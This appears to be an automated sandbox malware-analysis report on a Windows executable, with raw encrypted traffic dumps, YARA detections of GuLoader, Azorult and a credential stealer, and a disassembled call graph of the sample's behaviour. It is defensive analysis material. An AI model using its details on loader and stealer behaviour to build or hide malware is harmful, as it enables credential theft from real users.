                                                              2024-11-04 08:27:54 UTC4914INData Raw: 6f d7 2a 2f 93 59 72 f1 08 34 ba 76 a3 0f d5 01 6b b3 ca ec 26 f4 55 d5 0f cf 3f ef 39 2f 33 03 66 0c 98 c4 01 3d 66 5c 3d 5d 6e 1c b7 fb 74 ba 90 b6 31 37 6a a1 e1 97 b8 1d 5b 7c 79 76 92 8d 27 1d 24 b2 e1 13 8a 48 d6 67 54 ea 80 60 69 a1 42 bc e3 3b 40 f1 00 e8 5f d9 92 5d 45 f3 50 9c 2d 26 92 be 05 36 a4 02 24 da 24 d5 fe f7 f6 08 19 98 8e 42 d8 e3 ac 7f 8e 54 6d fb a4 19 d8 a0 f3 e9 fd 87 66 8c d3 69 4f 35 9f 1a 1f 2c d8 56 75 f6 95 d3 bd f5 a1 c5 ca cd b7 73 f3 0c 8f 5b d1 95 e1 70 ea 11 19 ba f2 35 7b 3b 12 e3 93 24 bc d0 55 17 61 e3 c3 9f b3 cc e4 b9 47 30 b0 e3 0c 6d 82 1e 45 c7 1f 24 59 7a 07 ef 90 3a 40 5e 5c cd 7f 0a b6 d1 f3 db e1 30 0f a1 f2 ae 36 d4 14 40 73 25 aa d5 0b 7b f5 22 45 b8 8b 47 dc 4e 35 42 ba 53 4d 6f 8f 58 8f d2 2f 93 9f 20 ce
                                                              Data Ascii: o*/Yr4vk&U?9/3f=f\=]nt17j[|yv'$HgT`iB;@_]EP-&6$$BTmfiO5,Vus[p5{;$UaG0mE$Yz:@^\06@s%{"EGN5BSMoX/
                                                              2024-11-04 08:27:54 UTC4874INData Raw: e5 b3 6e 62 82 fa d6 4a c5 c6 bb 16 8c 60 c1 2d 44 37 62 05 6e 08 82 04 aa 35 a6 bb 20 0f 29 23 12 5e 44 8e 14 19 3b a2 a9 9e 05 30 7d 86 63 ec 50 63 63 40 75 77 67 9e 0b 5e 44 5f a1 ba 9f 9a 1c 1c 25 89 9e bf 72 e4 a4 53 77 44 e0 1c ea b8 97 a9 53 2a cf a2 41 a0 46 2d 4f 32 4c 92 69 c7 29 38 d2 0c de b6 62 cf 40 1d b7 9a 41 3e b3 11 15 6c 83 6a 4b a8 9c 32 9d 73 16 f7 f9 df a3 69 df 88 70 f4 72 89 76 ce 70 f5 28 f8 16 92 ff ad 79 26 aa bf 02 b6 e4 7a e5 2c 1e cd 00 f2 5f b7 f9 2d 10 e6 e0 92 de 0f 73 fc 23 15 d4 82 88 59 a9 9e ba 1b 95 a5 cb e1 77 ea 2f 4d cf 7a aa 14 d0 3e a1 e7 8d 90 42 de 66 e5 49 e7 0d 50 35 35 37 9c 82 73 de 36 56 ed 7d 2d 3b 66 95 c9 e9 bd c0 a7 a2 a1 95 91 de 69 e7 d4 69 cc 26 b8 9f c5 18 62 b3 07 34 cc c4 22 e3 8e 3b 05 1b 55 b9
                                                              Data Ascii: nbJ`-D7bn5 )#^D;0}cPcc@uwg^D_%rSwDS*AF-O2Li)8b@A>ljK2siprvp(y&z,_-s#Yw/Mz>BfIP557s6V}-;fii&b4";U
                                                              2024-11-04 08:27:54 UTC1319INData Raw: ec fd 6b 4e 23 29 1a 4c 02 3a db 63 15 c7 3e 78 a3 33 4b 65 97 94 54 3b c1 40 2f b8 6f 5a 10 9a e4 f2 1b 65 44 39 af 6a a4 74 57 03 e5 3b 6c 74 cc d7 15 16 f1 ca 2b 33 b2 17 a7 bc 97 43 b6 ad bd eb e3 91 94 33 94 a2 35 f5 0a 1d 9a 4e 8f 54 b8 97 34 e5 62 d6 79 0d 23 5b aa 33 cc d8 ec e0 9a 19 70 b6 9b bf 07 ff 47 ba 32 32 55 6f 8a 6e f0 fa ba 96 6f 48 11 71 67 89 4b bf 89 84 c4 26 fd 58 28 3d 6c 65 f8 72 09 f1 4b b2 ee 29 2e 8b 8a 56 00 f6 2b b0 2f 12 a6 79 f8 40 7b 01 1d 01 c2 c7 13 55 14 4a a2 32 da a5 3c 91 a1 c9 39 62 3f 98 17 de 80 d1 2a 30 eb 76 11 7a e3 7b e1 d8 4a 7e c4 06 17 78 b8 2b b7 c5 fe eb 20 02 a5 83 07 b9 5d 66 0f fa 0b 30 8e 0e f0 16 af 37 c9 c1 41 0b d2 68 60 29 83 ae bb be c5 b8 cd ce 1c 9c 27 7c bb 14 6c d2 8b de 06 c9 1e d6 74 35 12
                                                              Data Ascii: kN#)L:c>x3KeT;@/oZeD9jtW;lt+3C35NT4by#[3pG22UonoHqgK&X(=lerK).V+/y@{UJ2<9b?*0vz{J~x+ ]f07Ah`)'|lt5
                                                              2024-11-04 08:27:54 UTC1378INData Raw: b4 4f bb c9 45 0e 6c 08 77 18 00 c6 a6 a8 75 59 c6 d4 3a 8a db aa 34 6b 49 fe ef 19 2c a5 03 e1 85 9f a6 14 55 f5 8d 11 ac c6 35 35 61 88 4f e6 7c 7e 9f dd 35 7f 9f ad 15 38 55 55 23 60 ed 19 90 bc f1 f0 b4 e4 2f ad 8a f6 e9 09 08 2c 77 e9 ba d9 32 9e 54 c8 87 e6 f7 0f 09 3b 32 79 80 41 54 6f 2e d3 a2 39 ad 38 02 95 e4 cd 97 24 b9 95 33 44 eb 0b 77 5c 53 bc d4 02 06 1a 89 7c dd a1 53 f9 5f 1e de 55 d0 e9 23 dd 14 ee 80 a3 c6 16 4b 31 8c f2 09 20 26 fb e0 96 ab 62 b4 10 1e aa d7 89 4b 39 55 ca 7c 8a 50 72 18 1c 9b 63 ef e8 55 c4 18 88 ad a9 03 01 cd a7 2f ba 2c 6d 31 ed 48 4e 88 c2 17 5b 1f b6 9e 5f 3d e6 fd e4 5b 70 1b c7 3b 20 d2 fc 06 f4 e5 2d b5 8c 20 64 a1 d2 05 16 d8 94 eb 81 fa d2 5c a4 ee 16 33 41 64 b6 55 b0 37 70 3a b1 c3 be 12 a4 11 5e d5 80 bd
                                                              Data Ascii: OElwuY:4kI,U55aO|~58UU#`/,w2T;2yATo.98$3Dw\S|S_U#K1 &bK9U|PrcU/,m1HN[_=[p; - d\3AdU7p:^
                                                              2024-11-04 08:27:54 UTC1378INData Raw: b7 75 d3 4d 33 81 0f 71 01 08 ec 72 5f 24 a2 3d bb 22 cb 02 82 b3 50 5c b3 78 34 6b e2 08 00 c2 57 e7 08 53 be a4 6e d3 24 1a da bd 51 c3 cd dd 0a 9b b7 35 8a e0 12 d4 80 52 28 f0 fe de 10 71 11 94 83 98 32 fe a0 42 e1 31 e9 05 4a 4c fe 6d 74 4a ef bb 73 77 82 1f 0e fb 29 3c 88 d6 a7 21 cf 9f d0 64 0f f7 d0 ff f6 1c 88 d4 ab 96 32 ec 89 a0 c3 70 d4 c1 1c 30 90 9c 95 8d dd 80 36 fa 0e 62 b2 a1 90 aa 34 c9 4d 9a a9 c4 db ae c0 c2 9a 01 d0 62 78 d8 04 0b 49 ac ee 0f ec eb 0b 3b 6f 72 ec b4 93 b2 6b be c0 6a b3 99 01 01 8f 27 d0 9b 6d 23 89 e3 af 1f da 7a c9 df f2 37 1b 89 23 0f 0a cc 9d c3 b1 5b b0 6c 04 29 9c d2 2b 88 fb 43 e2 eb 68 83 d7 53 67 0a cb 84 f5 f7 3d 8c 4c 39 68 54 14 87 0b 07 06 0d 13 9d f2 7d 64 f4 da da 2f b1 96 00 8a 69 b3 0a 2d df 74 db af
                                                              Data Ascii: uM3qr_$="P\x4kWSn$Q5R(q2B1JLmtJsw)<!d2p06b4MbxI;orkj'm#z7#[l)+ChSg=L9hT}d/i-t
                                                              2024-11-04 08:27:54 UTC1378INData Raw: 39 dc 4a ce 09 94 4e 7d 88 6b 8d 45 87 bf 91 db 5e 75 33 0a 9a b5 06 de c6 e9 a3 7b de 94 d0 67 ea c4 23 b0 08 f8 1c 2d be d6 c8 32 79 3e ca 6d 1e 06 6d 5b b4 55 86 cc ad 9b 50 21 ca 60 54 19 a9 8d 29 9b 71 d6 b7 ee 29 31 ab cb a3 0d c5 08 df 4f 82 7d ae 1d 0f 16 49 aa 28 ab 54 18 68 50 8d b3 ed d8 02 3e 83 12 2d dd e0 83 1f 72 87 e5 00 cc eb e5 4a e1 37 f2 d1 09 b9 eb 5d 92 e6 95 5f d0 87 71 44 bf de 91 c1 12 7b 96 88 df e0 fe da 92 aa c1 15 60 bc 85 aa 08 4c 10 e4 a6 c5 6a 77 da 54 85 ef 1f 50 e0 6c e7 e9 e0 0f 22 4f 5f 77 48 7b 60 21 20 70 9e d6 34 1b 2d 08 81 c2 1a 37 90 d7 93 c9 a8 82 1b cf 4b e4 42 aa aa e0 0b ac 47 9d e0 c0 30 46 6b 17 d8 88 01 bb a8 08 64 f7 c9 59 f9 d9 93 54 f4 e3 37 f7 3e c0 37 2a e5 a8 38 e1 6c 16 bf 4b 8d 53 44 04 57 e0 55 e8
                                                              Data Ascii: 9JN}kE^u3{g#-2y>mm[UP!`T)q)1O}I(ThP>-rJ7]_qD{`LjwTPl"O_wH{`! p4-7KBG0FkdYT7>7*8lKSDWU
                                                              2024-11-04 08:27:54 UTC1378INData Raw: 68 11 24 0b b9 bf fa 57 93 27 96 c4 96 ff 0d e3 d8 a4 43 ac a5 e7 fc 90 45 11 4b a8 8e d6 55 2c 20 6e ec bf ca be 7d ff 41 f8 8b ca 56 3c 73 2e c1 a5 1e 82 24 94 ed 5b d6 4b 72 41 14 24 80 8f 44 75 4b e1 38 3f 51 98 b3 84 cb 84 47 ea 90 db 86 fe e7 86 cd cc b3 12 9b 8d 3e c5 de f2 44 57 dc c4 49 a2 a5 db b2 5d 8c 3d af c9 34 eb 93 ea a5 6f 0d 8a 25 98 20 7a ed 75 26 7e 4e 9f f2 d0 00 7d 9c f3 42 30 a6 23 0e 90 50 91 a3 7b 5d 47 b3 76 6f 7b 4d 3b 6c 87 1e a1 88 87 a8 72 d9 34 10 eb 53 aa de d7 f6 91 9e 6f 77 de 3a 88 a3 f4 89 8c 83 be d8 94 7f fd 27 04 cc 3c a0 46 8a 4c fd 32 2f 19 4a c5 c1 e0 dd da 9a ce 52 33 fe de 91 b5 15 74 7c d1 97 d4 d9 49 ab 72 18 49 09 09 7b e2 df a4 16 6e f0 51 64 fc 92 f8 53 70 3c de a8 f7 d9 20 d5 c1 0f 46 b1 f5 f6 72 81 d4 ab
                                                              Data Ascii: h$W'CEKU, n}AV<s.$[KrA$DuK8?QG>DWI]=4o% zu&~N}B0#P{]Gvo{M;lr4Sow:'<FL2/JR3t|IrI{nQdSp< Fr
                                                              2024-11-04 08:27:54 UTC1378INData Raw: 45 e8 b2 5a 2b 49 94 f3 d3 3c ee 52 55 bb 37 b9 c5 b2 26 96 14 61 df 58 82 c1 91 4b d3 43 50 66 77 3f a7 d4 3a 7b 9b 48 4c d7 b7 be 04 e9 5a 46 50 4c 6f 2b a3 e5 92 7f db 28 67 cb 02 bf b6 f9 a1 97 13 7b e4 da 8f 4e c9 63 69 d4 82 fc d3 b5 07 97 3d 51 b2 14 36 77 15 ac 8e ae 7a b1 ec 25 c9 6a 9f 20 ee 0f de 65 e5 c8 1c e6 60 dd ce fb ec ee 9b 58 c8 22 d1 5b 45 87 24 16 e2 e5 94 d2 66 d6 4b 71 22 61 96 93 23 43 fd e2 6a 03 9f 57 6f c7 62 17 cf 06 02 de 95 86 24 58 54 8d cc 38 d2 db c3 7a 4c 5d e5 37 12 57 fb e0 0c aa 2b de 98 37 3d 32 12 fb e7 46 aa e7 ac 54 43 25 51 3e 7a ed 55 0f 40 0e e1 7d 07 83 34 98 af 97 78 a8 a6 c2 2c d1 4a d4 7f a9 74 73 d5 cf 40 49 33 d4 cd a4 aa fa 39 bf 49 d5 cc 10 fe 53 23 c5 d7 f6 35 18 16 78 ab 89 88 0a 3b c0 c1 b4 25 ce 5f
                                                              Data Ascii: EZ+I<RU7&aXKCPfw?:{HLZFPLo+(g{Nci=Q6wz%j e`X"[E$fKq"a#CjWob$XT8zL]7W+7=2FTC%Q>zU@}4x,Jts@I39IS#5x;%_
                                                              2024-11-04 08:27:54 UTC1378INData Raw: 0e 4c 90 ac dd 77 12 d8 38 65 8a 44 d6 da d4 d5 ae 6d f2 29 9e 93 21 3a 4f cf b5 41 01 dd 70 64 87 4f 80 bf 5f fa e8 31 c3 6b dd fd 6e 7c ee 3e dd c9 75 97 03 9c 3b 32 95 ad 06 55 e7 30 5c 5a 25 2b e7 1e 12 83 92 2d ec c7 49 16 87 b6 fe c4 90 32 61 d5 5d ee 21 be cf 77 20 68 c6 d0 28 db a4 b9 53 0b 64 dc ac 6d d8 fc ca 88 5a ff 99 b0 74 86 92 f3 81 16 13 61 46 24 aa 53 03 10 03 85 1a 94 92 94 80 c0 99 08 06 c2 aa df 6c f9 19 70 b1 76 87 92 95 82 cf 93 94 42 6c 0e d5 4d 8f ec b8 71 25 ae 43 fe a1 78 a0 3a 52 d2 0d eb 32 ac 26 6c 8d ec 3e 9b b8 01 63 98 16 f8 da c6 56 7b 04 05 4b 83 e9 f6 9f 28 b3 a2 a2 f0 69 53 14 3c 94 68 12 dd 5c 95 9e f8 18 97 b3 85 c7 07 cc 57 e9 ed 90 e4 df 7a b9 f8 38 15 93 0a ca 40 6e 24 97 bb 8e f6 9d 08 20 f0 96 0f ef f2 1a 31 b0
                                                              Data Ascii: Lw8eDm)!:OApdO_1kn|>u;2U0\Z%+-I2a]!w h(SdmZtaF$SlpvBlMq%Cx:R2&l>cV{K(iS<h\Wz8@n$ 1
                                                              2024-11-04 08:27:54 UTC1378INData Raw: 46 f6 01 25 94 9b 8e 1c 33 0f 9c 93 3e 9c 2d c4 ff ae cd 6d 4f 3d d6 eb 12 42 5d 12 53 6f f2 9b b1 11 73 89 15 8d fd 12 09 f1 69 a4 fe 22 f2 d8 e1 0e 79 30 ab 92 f2 15 1e d2 28 d1 2c 32 c3 fe 05 01 36 3f a9 f7 09 82 64 e5 ee 8d 8a d4 0b 29 7f 59 cb 0d 05 be 2e a1 61 51 19 7a 6c 1e 92 96 c5 3d 28 f3 7b cb 88 e4 a4 dc ec 7f cb d7 ef fc 6c ee 6a dd a1 95 7a f5 67 ec 99 a0 c7 6b 41 6a 22 7d 83 b5 56 f0 05 72 63 9b e8 66 7e 93 3c 6d 4d 1f c8 ff dc 28 14 c2 32 cb 18 a3 11 c5 d5 2b a9 46 b1 d7 b1 7b 57 57 61 a7 91 c2 31 cd d6 23 ea 7b 37 8f fb b1 ad 96 22 7d f2 28 a4 b1 2a b4 9e d1 27 b3 03 eb 69 e6 2a 0d 44 21 67 97 89 a3 31 b8 49 87 4b d8 5b ff 04 4d 99 0b 1d 22 7d 03 f0 21 ec 3e 5a fd fd b7 53 88 9e af de 20 ce bf 17 ac 66 49 5c c9 2b 26 1e 3a a5 c8 97 0e 10
                                                              Data Ascii: F%3>-mO=B]Sosi"y0(,26?d)Y.aQzl=({ljzgkAj"}Vrcf~<mM(2+F{WWa1#{7"}(*'i*D!g1IK[M"}!>ZS fI\+&:


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:03:26:57
                                                              Start date:04/11/2024
                                                              Path:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\No. 1349240400713.exe"
                                                              Imagebase:0x400000
                                                              File size:670'091 bytes
                                                              MD5 hash:0049A8CE1E4C42CEA9B5D2516C64612C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1607100598.0000000000870000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1607296035.0000000003413000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:04:31:19
                                                              Start date:04/11/2024
                                                              Path:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\No. 1349240400713.exe"
                                                              Imagebase:0x400000
                                                              File size:670'091 bytes
                                                              MD5 hash:0049A8CE1E4C42CEA9B5D2516C64612C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000009.00000003.1880587120.0000000037070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000009.00000003.1879186394.0000000037054000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1880512323.00000000378C8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1880531746.00000000378CC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:22.4%
                                                                Dynamic/Decrypted Code Coverage:13.7%
                                                                Signature Coverage:15.9%
                                                                Total number of Nodes:1571
                                                                Total number of Limit Nodes:46
                                                                execution_graph 3901 6edf29df 3902 6edf2a2f 3901->3902 3903 6edf29ef VirtualProtect 3901->3903 3903->3902 3904 401941 3905 401943 3904->3905 3910 402d3e 3905->3910 3911 402d4a 3910->3911 3955 40644e 3911->3955 3914 401948 3916 405b23 3914->3916 3997 405dee 3916->3997 3919 405b62 3922 405c82 3919->3922 4011 406411 lstrcpynW 3919->4011 3920 405b4b DeleteFileW 3921 401951 3920->3921 3922->3921 4040 40676f FindFirstFileW 3922->4040 3924 405b88 3925 405b9b 3924->3925 3926 405b8e lstrcatW 3924->3926 4012 405d32 lstrlenW 3925->4012 3928 405ba1 3926->3928 3931 405bb1 lstrcatW 3928->3931 3932 405bbc lstrlenW FindFirstFileW 3928->3932 3931->3932 3932->3922 3935 405bde 3932->3935 3933 405cab 4043 405ce6 lstrlenW CharPrevW 3933->4043 3937 405c65 FindNextFileW 3935->3937 3954 405c26 3935->3954 4016 406411 lstrcpynW 3935->4016 3937->3935 3941 405c7b FindClose 3937->3941 3938 405adb 5 API calls 3940 405cbd 3938->3940 3942 405cc1 3940->3942 3943 405cd7 3940->3943 3941->3922 3942->3921 3946 405479 24 API calls 3942->3946 3945 405479 24 API calls 3943->3945 3945->3921 3948 405cce 3946->3948 3947 405b23 60 API calls 3947->3954 3950 4061d7 36 API calls 3948->3950 3949 405479 24 API calls 3949->3937 3952 405cd5 3950->3952 3952->3921 3954->3937 3954->3947 3954->3949 4017 405adb 3954->4017 4025 405479 3954->4025 4036 4061d7 MoveFileExW 3954->4036 3971 40645b 3955->3971 3956 4066a6 3957 402d6b 3956->3957 3988 406411 lstrcpynW 3956->3988 3957->3914 3972 4066c0 3957->3972 3959 406674 lstrlenW 3959->3971 3961 40644e 10 API calls 3961->3959 3964 406589 GetSystemDirectoryW 3964->3971 3965 40659c GetWindowsDirectoryW 3965->3971 3966 4066c0 5 API calls 3966->3971 3967 40644e 10 API calls 3967->3971 3968 406617 lstrcatW 3968->3971 3969 4065d0 SHGetSpecialFolderLocation 3970 4065e8 SHGetPathFromIDListW CoTaskMemFree 3969->3970 3969->3971 3970->3971 3971->3956 3971->3959 3971->3961 3971->3964 3971->3965 3971->3966 3971->3967 3971->3968 3971->3969 3981 4062df 3971->3981 3986 406358 wsprintfW 3971->3986 3987 406411 lstrcpynW 3971->3987 3978 4066cd 3972->3978 3973 406743 3974 406748 CharPrevW 3973->3974 3976 406769 3973->3976 3974->3973 3975 406736 CharNextW 3975->3973 3975->3978 3976->3914 3978->3973 3978->3975 3979 406722 CharNextW 3978->3979 3980 406731 CharNextW 3978->3980 3993 405d13 3978->3993 3979->3978 3980->3975 3989 40627e 3981->3989 3984 406313 RegQueryValueExW RegCloseKey 3985 406343 3984->3985 3985->3971 3986->3971 3987->3971 3988->3957 3990 40628d 3989->3990 3991 406291 3990->3991 3992 406296 RegOpenKeyExW 3990->3992 3991->3984 3991->3985 3992->3991 3994 405d19 3993->3994 3995 405d2f 3994->3995 3996 405d20 CharNextW 3994->3996 3995->3978 3996->3994 4046 406411 lstrcpynW 3997->4046 3999 405dff 4047 405d91 CharNextW CharNextW 3999->4047 4002 405b43 4002->3919 4002->3920 4003 4066c0 5 API calls 4009 405e15 4003->4009 4004 405e46 lstrlenW 4005 405e51 4004->4005 4004->4009 4007 405ce6 3 API calls 4005->4007 4006 40676f 2 API calls 4006->4009 4008 405e56 GetFileAttributesW 4007->4008 4008->4002 4009->4002 4009->4004 4009->4006 4010 405d32 2 API calls 4009->4010 4010->4004 4011->3924 4013 405d40 4012->4013 4014 405d52 4013->4014 4015 405d46 CharPrevW 4013->4015 4014->3928 4015->4013 4015->4014 4016->3935 4053 405ee2 GetFileAttributesW 4017->4053 4020 405af6 RemoveDirectoryW 4023 405b04 4020->4023 4021 405afe DeleteFileW 4021->4023 4022 405b08 4022->3954 4023->4022 4024 405b14 SetFileAttributesW 4023->4024 4024->4022 4026 405494 4025->4026 4027 405536 4025->4027 4028 4054b0 lstrlenW 4026->4028 4029 40644e 17 API calls 4026->4029 4027->3954 4030 4054d9 4028->4030 4031 4054be lstrlenW 4028->4031 4029->4028 4033 4054ec 4030->4033 4034 4054df SetWindowTextW 4030->4034 4031->4027 4032 4054d0 lstrcatW 4031->4032 4032->4030 4033->4027 4035 4054f2 SendMessageW SendMessageW SendMessageW 4033->4035 4034->4033 4035->4027 4037 4061eb 4036->4037 4039 4061f8 4036->4039 4056 40605d 4037->4056 4039->3954 4041 405ca7 4040->4041 4042 406785 FindClose 4040->4042 4041->3921 4041->3933 4042->4041 4044 405d02 lstrcatW 4043->4044 4045 405cb1 4043->4045 4044->4045 4045->3938 4046->3999 4048 405dae 4047->4048 4050 405dc0 4047->4050 4048->4050 4051 405dbb CharNextW 4048->4051 4049 405de4 4049->4002 4049->4003 4050->4049 4052 405d13 CharNextW 4050->4052 4051->4049 4052->4050 4054 405ae7 4053->4054 4055 405ef4 SetFileAttributesW 4053->4055 4054->4020 4054->4021 4054->4022 4055->4054 4057 4060b3 GetShortPathNameW 4056->4057 4058 40608d 4056->4058 4060 4061d2 4057->4060 4061 4060c8 4057->4061 4083 405f07 GetFileAttributesW CreateFileW 4058->4083 4060->4039 4061->4060 4063 4060d0 wsprintfA 4061->4063 4062 406097 CloseHandle GetShortPathNameW 4062->4060 4064 4060ab 4062->4064 4065 40644e 17 API calls 4063->4065 4064->4057 4064->4060 4066 4060f8 4065->4066 4084 405f07 GetFileAttributesW CreateFileW 4066->4084 4068 406105 4068->4060 4069 406114 GetFileSize GlobalAlloc 4068->4069 4070 406136 4069->4070 4071 4061cb CloseHandle 4069->4071 4085 405f8a ReadFile 4070->4085 4071->4060 4076 406155 lstrcpyA 4079 406177 4076->4079 4077 406169 4078 405e6c 4 API calls 4077->4078 4078->4079 4080 4061ae SetFilePointer 4079->4080 4092 405fb9 WriteFile 4080->4092 4083->4062 4084->4068 4086 405fa8 4085->4086 4086->4071 4087 405e6c lstrlenA 4086->4087 4088 405ead lstrlenA 4087->4088 4089 405eb5 4088->4089 4090 405e86 lstrcmpiA 4088->4090 4089->4076 4089->4077 4090->4089 4091 405ea4 CharNextA 4090->4091 4091->4088 4093 405fd7 GlobalFree 4092->4093 4093->4071 4094 4015c1 4095 402d3e 17 API calls 4094->4095 4096 4015c8 4095->4096 4097 405d91 4 API calls 4096->4097 4112 4015d1 4097->4112 4098 401631 4100 401663 4098->4100 4101 401636 4098->4101 4099 405d13 CharNextW 4099->4112 4103 401423 24 API calls 4100->4103 4121 401423 4101->4121 4109 40165b 4103->4109 4108 40164a SetCurrentDirectoryW 4108->4109 4110 401617 GetFileAttributesW 4110->4112 4112->4098 4112->4099 4112->4110 4113 4059e2 4112->4113 4116 405948 CreateDirectoryW 4112->4116 4125 4059c5 CreateDirectoryW 4112->4125 4128 406806 GetModuleHandleA 4113->4128 4117 405995 4116->4117 4118 405999 GetLastError 4116->4118 4117->4112 4118->4117 4119 4059a8 SetFileSecurityW 4118->4119 4119->4117 4120 4059be GetLastError 4119->4120 4120->4117 4122 405479 24 API calls 4121->4122 4123 401431 4122->4123 4124 406411 lstrcpynW 4123->4124 4124->4108 4126 4059d5 4125->4126 4127 4059d9 GetLastError 4125->4127 4126->4112 4127->4126 4129 406822 4128->4129 4130 40682c GetProcAddress 4128->4130 4134 406796 GetSystemDirectoryW 4129->4134 4132 4059e9 4130->4132 4132->4112 4133 406828 4133->4130 4133->4132 4135 4067b8 wsprintfW LoadLibraryExW 4134->4135 4135->4133 4232 401c43 4233 402d1c 17 API calls 4232->4233 4234 401c4a 4233->4234 4235 402d1c 17 API calls 4234->4235 4236 401c57 4235->4236 4238 402d3e 17 API calls 4236->4238 4242 401c6c 4236->4242 4237 401c7c 4240 401cd3 4237->4240 4241 401c87 4237->4241 4238->4242 4239 402d3e 17 API calls 4239->4237 4244 402d3e 17 API calls 4240->4244 4243 402d1c 17 API calls 4241->4243 4242->4237 4242->4239 4245 401c8c 4243->4245 4246 401cd8 4244->4246 4247 402d1c 17 API calls 4245->4247 4248 402d3e 17 API calls 4246->4248 4250 401c98 4247->4250 4249 401ce1 FindWindowExW 4248->4249 4253 401d03 4249->4253 4251 401cc3 SendMessageW 4250->4251 4252 401ca5 SendMessageTimeoutW 4250->4252 4251->4253 4252->4253 5046 402b43 5047 406806 5 API calls 5046->5047 5048 402b4a 5047->5048 5049 402d3e 17 API calls 5048->5049 5050 402b53 5049->5050 5051 402b57 IIDFromString 5050->5051 5052 402b8e 5050->5052 5051->5052 5053 402b66 5051->5053 5053->5052 5056 406411 lstrcpynW 5053->5056 5055 402b83 CoTaskMemFree 5055->5052 5056->5055 4258 4034c5 SetErrorMode GetVersion 4259 403504 4258->4259 4260 40350a 4258->4260 4261 406806 5 API calls 4259->4261 4262 406796 3 API calls 4260->4262 4261->4260 4263 403520 lstrlenA 4262->4263 4263->4260 4264 403530 4263->4264 4265 406806 5 API calls 4264->4265 4266 403537 4265->4266 4267 406806 5 API calls 4266->4267 4268 40353e 4267->4268 4269 406806 5 API calls 4268->4269 4270 40354a #17 OleInitialize SHGetFileInfoW 4269->4270 4348 406411 lstrcpynW 4270->4348 4273 403596 GetCommandLineW 4349 406411 lstrcpynW 4273->4349 4275 4035a8 4276 405d13 CharNextW 4275->4276 4277 4035cd CharNextW 4276->4277 4278 4036f7 GetTempPathW 4277->4278 4280 4035e6 4277->4280 4350 403494 4278->4350 4280->4280 4285 405d13 CharNextW 4280->4285 4292 4036e2 4280->4292 4294 4036e0 4280->4294 4281 40370f 4282 403713 GetWindowsDirectoryW lstrcatW 4281->4282 4283 403769 DeleteFileW 4281->4283 4284 403494 12 API calls 4282->4284 4360 403015 GetTickCount GetModuleFileNameW 4283->4360 4287 40372f 4284->4287 4285->4280 4287->4283 4289 403733 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4287->4289 4288 40377d 4290 403830 4288->4290 4295 403820 4288->4295 4299 405d13 CharNextW 4288->4299 4293 403494 12 API calls 4289->4293 4447 403a06 4290->4447 4444 406411 lstrcpynW 4292->4444 4297 403761 4293->4297 4294->4278 4388 403ae0 4295->4388 4297->4283 4297->4290 4312 40379c 4299->4312 4301 40396a 4304 403972 GetCurrentProcess OpenProcessToken 4301->4304 4305 4039ee ExitProcess 4301->4305 4302 40384a 4454 405a77 4302->4454 4310 40398a LookupPrivilegeValueW AdjustTokenPrivileges 4304->4310 4311 4039be 4304->4311 4307 403860 4314 4059e2 5 API calls 4307->4314 4308 4037fa 4313 405dee 18 API calls 4308->4313 4310->4311 4315 406806 5 API calls 4311->4315 4312->4307 4312->4308 4316 403806 4313->4316 4317 403865 lstrcatW 4314->4317 4318 4039c5 4315->4318 4316->4290 4445 406411 lstrcpynW 4316->4445 4319 403881 lstrcatW lstrcmpiW 4317->4319 4320 403876 lstrcatW 4317->4320 4321 4039da ExitWindowsEx 4318->4321 4322 4039e7 4318->4322 4319->4290 4324 40389d 4319->4324 4320->4319 4321->4305 4321->4322 4463 40140b 4322->4463 4327 4038a2 4324->4327 4328 4038a9 4324->4328 4326 403815 4446 406411 lstrcpynW 4326->4446 4331 405948 4 API calls 4327->4331 4329 4059c5 2 API calls 4328->4329 4332 4038ae SetCurrentDirectoryW 4329->4332 4333 4038a7 4331->4333 4334 4038c9 4332->4334 4335 4038be 4332->4335 4333->4332 4459 406411 lstrcpynW 4334->4459 4458 406411 lstrcpynW 4335->4458 4338 40644e 17 API calls 4339 403908 DeleteFileW 4338->4339 4340 403915 CopyFileW 4339->4340 4345 4038d7 4339->4345 4340->4345 4341 40395e 4342 4061d7 36 API calls 4341->4342 4342->4290 4343 4061d7 36 API calls 4343->4345 4344 40644e 17 API calls 4344->4345 4345->4338 4345->4341 4345->4343 4345->4344 4347 403949 CloseHandle 4345->4347 4460 4059fa CreateProcessW 4345->4460 4347->4345 4348->4273 4349->4275 4351 4066c0 5 API calls 4350->4351 4353 4034a0 4351->4353 4352 4034aa 4352->4281 4353->4352 4354 405ce6 3 API calls 4353->4354 